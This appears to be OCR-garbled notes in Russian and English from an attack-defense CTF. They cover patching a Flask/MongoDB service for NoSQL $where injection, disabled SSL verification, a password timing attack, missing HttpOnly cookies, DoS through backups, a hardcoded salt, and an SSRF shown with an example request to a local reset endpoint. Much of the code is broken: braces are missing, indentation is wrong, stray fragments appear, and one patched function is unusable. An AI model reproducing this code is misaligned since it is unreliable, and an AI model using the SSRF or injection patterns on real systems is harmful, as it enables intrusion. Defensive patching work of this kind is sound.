         print(e)
         return False
def change_password(self, uid: int, password: str):
    self.__check_connection()
hashed = self.hash_password(password)
    #r = self.users.update_one(("$where": f"this.uid == '{uid}'"}, {"$set": {"password": hashed}})
    r = self.users.update_one({
    'uid': {
              '$eq': str(uid)
    }, {"$set": {"password": hashed}})
    print(r)
    if r.modified_count == 0:
         return False
    return True
def get_user_id(self, username):
    self.__check_connection()
    try:
         \#u = self.users.find({"$where": f"this.username == '{username}'"})[0]
         # PATCH 3
         u = self.users.find({
             'username': {
    '$eq': username
        })[0]
         return u['uid']
    except IndexError:
        return False
def get_user_by_uid(self, uid: int):
    self.__check_connection()
    try:
         # PATCH 8
         #u = self.users.find({"$where": f"this.uid == '{uid}'"}, {" id":0})[0]
         u = self.users.find({
             'uid': {
    '$eq': uid
```

```
return u
    except IndexError:
        return False
def get user(self, username: str):
    self.__check_connection()
        #u = self.users.find({"$where": f"this.username == '{username}'"})[0]
        u = self.users.find(
                 "username": {
                     "$eq": username
                }
        101 (
        return u
    except IndexError as e:
        return False
def get_users(self):
    self.__check_connection()
users = self.users.find({}, {"_id":0})
    return list(users)
def set_permissions(self, username, permissions):
    self.__check_connection()
user = self.get_user(username)
    self.permissions.insert_one({"username": username, "permissions": permissions, "uid": user["uid"]})
    return user['uid']
def get_permissions(self, username: str):
    self.__check_connection()
    try:
         \#p = self.permissions.find({"\$where": f"this.username == '{username}'"})[0]['permissions'] 
        # PATCH 2
        p = self.permissions.find(
                 "username": {
                      "$eq": username
        )[0]['permissions']
    return p
except IndexError:
        return False
try:
        # PATCH 7
        # p = self.permissions.find({"$where": f"this.uid == '{user['uid']}'"})[0]['permissions']
        p = self.permissions.find({
             'uid': user['uid']
        })[0]['permissions']
        return p
    except IndexError:
        return False
def delete_user(self, username):
    #self._check_connection()
#self.users.delete_one({"$where": f"this.username == '{username}'"})
    # PATCH 6
    self.users.delete one({
        'username': {
    '$eq': username
    })
def delete_permissions(self, username):
    self.__check_connection()
    #self.permissions.delete_one({"$where": f"this.username == '{username}'"})
    self.permissions.delete_one({
         'username': {
             '$eq': username
    })
def create_backup(self, backup):
    self.__check_connection()
backup = base64.b64encode(json.dumps(backup).encode()).decode()
       next_bid = self.backups.find_one(sort=[('bid', pymongo.DESCENDING)])['bid'] + 1
    except:
        next bid = 1
    self.backups.insert_one({'backup': backup, 'timestamp': int(time.time()), 'bid': next_bid})
    return next_bid
def get_backup(self, bid):
    self.__check_connection()
    #backup = self.backups.find({"$where": f"this.bid == '{bid}'"}, {'bid':0, '_id':0})
    self.backups.find({
         'bid': {
             '$eq': bid
    }, {'bid':0, ' id':0})
    return backup[0]
```

}, {"_id":0})[0]

```
@access.is_admin def get_backup(): bid = request.json['backup_id'] backup = connector.db.get_backup(bid) return make_response({"backup": backup}, 200)
Как видим, любой может создать бекап, но получить его может только админ. DOS
<b>patch:</b>
   `python=
@app.route('/put_backup_here', methods=['POST'])
@access.is_admin
def new backup():
    backup = request.get_json()
bid = connector.db.create_backup(backup)
     return make response({"status":"ok", "backup id":bid}, 200)
@app.route('/get backup', methods=['GET'])
@access.is_admin
def get_backup():
    bid = request.json['backup_id']
    backup = connector.db.get_backup(bid)
     return make_response({"backup": backup}, 200)

    ssl fix(проверка сертификатов ssl и tls) serverroom.py:

      class ServerRoom(Section):
            self.backup_url = ''
self.backup_url = ''
       def __init__(self):
    super(). init
            self.backup_date = ''
            self.data = {}
            self._session = requests.Session()
            self._session.mount('https://', TimeoutHTTPAdapter(max_retries=2))
self._session.mount('http://', TimeoutHTTPAdapter(max_retries=2))
            self. session.verify = False # # Отключение проверки сертификатов
      Из-за этого сервер уязвим перед MITM атаками, что даёт возможность злоумышленникам перехватить бэкапы. patch:self. session.verify = True
    5. можно реализовать тайм атаку на сравнение паролей при логине
       def import_from_db(self, username='', password='', user_id=None):
            if user_id != None:
    user_id = int(user_id)
                 user = self._connector.db.get_user_by_uid(user_id)
            else.
                user = self. connector.db.get user(username)
            if user == False:
            raise UserDoesntExist
self.email = user['email']
            self.username = user['username']
            self._hashed = user['password']
self.password = ''
            self.admin = user['admin']
            self.id = user['uid']
            if password:
                 password = self._connector.db.hash_password(password)
                 if password != self._hashed: # язва тут
                     raise WrongPassword
            permissions = self._connector.db.get_permissions(self.username)
            if permissions:
                 self.permissions = self. import permissions(permissions)
      patch:
      if secrets.compare_digest(password ,self._hashed):
    6. Добавили HTTP only cookie set_cookie("session", value = "value", httponly = True) set_cookie("user_id", value = "value", httponly = True)
    7. ssrf ```python= class ServerRoom(Section): def init(self):
       super().init('ServerRoom')
       self.backup_url =
       self.backup_date = ''
       self.data = {}
       self._session = requests.Session()
       self._session.mount('https://', TimeoutHTTPAdapter(max_retries=2))
self._session.mount('http://', TimeoutHTTPAdapter(max_retries=2))
       self. session.verify = False
def set backup url(self, url: str): self.backup url = url
def get_backup_url(self): return self.backup_url
def backup(self): self.backup date = str(datetime.now())
def update_data(self, data: str): self.data = json.loads(b64decode(data))
def send_backup(self): try:
     # PATCH 12
     # raises error if url is bad
    su = safeurl.SafeURL()
      = su.execute(self.backup url)
    answer = self._session.post(self.backup_url, json=self.data)
    return answer.json()
except Exception as e:
    print(e, flush=True)
return False
def full clean(self): self.data = {}
def get backup date(self): return self.backup date
```

{"element": "ServerRoom", "action": "set backup url", "args": "[http://127.0.0.1;8888/reset state"]} HTTP/1.1 200 OK Server: gunicorn Date: Thu, 23 Mar 2023 14:15:47 GMT

Connection: keep-alive Content-Type: application/json Content-Length: 30

3. DOS через создание множества бекапов в control/src/control.py ```python= @app.route('/put_backup_here', methods=['POST']) def new_backup(): backup =

request.get_json() bid = connector.db.create_backup(backup) return make_response({"status":"ok", "backup_id":bid}, 200) @app.route('/get_backup', methods=['GET'])

{"result":null, "status": "ok"} POST /execute HTTP/1.1 Host: emulator:8888 User-Agent: python-requests/2.28.2 Accept-Encoding: gzip, deflate Accept: / Connection: keep-alive Content-Length: 62 Content-Type: application/json

```
{"element": "ServerRoom", "action": "send_backup", "args": []}HTTP/1.1 200 OK
```

8) В эндпойте /execute (файл emulator.py) нет проверки на наличие у пользователя прав на исполнение выбранной функции. Поэтому, если на сервере будет у

9. в веб приложении соль должна рандомно генерироваться, так будет труднее произвести атаку на пароли (сбрутить) ```python class DB: def init(self, connection_string):

```
self.c_string = connection_string
self.__connect()
self.salt = b'$2b$12$THzbTRP4fVwlM1SitlNKSu'
if self.users.count_documents({}) != self.permissions.count_documents({}):
    self.client.drop_database('xss')
    self.__connect()
```